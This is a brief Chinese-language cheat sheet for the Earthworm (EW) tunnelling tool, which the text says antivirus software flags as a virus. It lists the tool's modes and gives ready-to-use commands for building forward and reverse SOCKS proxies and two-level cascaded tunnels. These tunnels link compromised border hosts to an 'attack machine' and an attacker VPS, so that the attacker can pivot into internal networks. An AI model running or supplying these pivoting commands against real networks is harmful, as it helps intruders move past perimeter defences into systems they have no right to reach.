# EW Earthworm (已经停止更新,被杀软列为病毒)
6种命令格式(ssocksd、rcsocks、rssocks、1cx_s1ave、1cx_listen、1cx_tran)ssocksd正向代理
rcsock 反向代理客户端
rssocks 反向代理服务端
1cx_s1ave 一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机
1cx_tran 通过监听本地端口接收代理请求,并转发给代理提供主机
1cx_listen 通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机
EW——1层连接(正向socks)
• 将边界机作为代理服务器
• 边界机:ew_for_Win.exe -s ssocksd -l 8888
EW——1层连接(反向socks)
• 反向socks
• 攻击机:ew_for_Win.exe -s rcsocks -l 8888 -e 6666
• 边界机:ew_for_Win.exe -s rssocks -d 192.168.7.144 -e 666
EW——2层级联(正向)
• 二级内网边界机:ew_for_Win.exe -s ssocksd -l 6666
• 一层内网边界机器:ew_for_Win.exe -s lcx_tran -l 8888 -f 二层内网ip -g 6666
ew_for_Win.exe -s lcx_tran -l 8888 -f 192.168.11.13 -g 6666
EW——2层级联(反向)
• 二级内网边界机:ew_for_Win.exe -s ssocksd -l 6666
• 攻击机外网的vps:ew_for_Win.exe -s lcx_listen -l 8888 -e 7777
• 一层内网边界机:ew_for_Win.exe -s lcx_slave -d 192.168.7.144 -e 7777 -f 192.168.11.14 -g 6666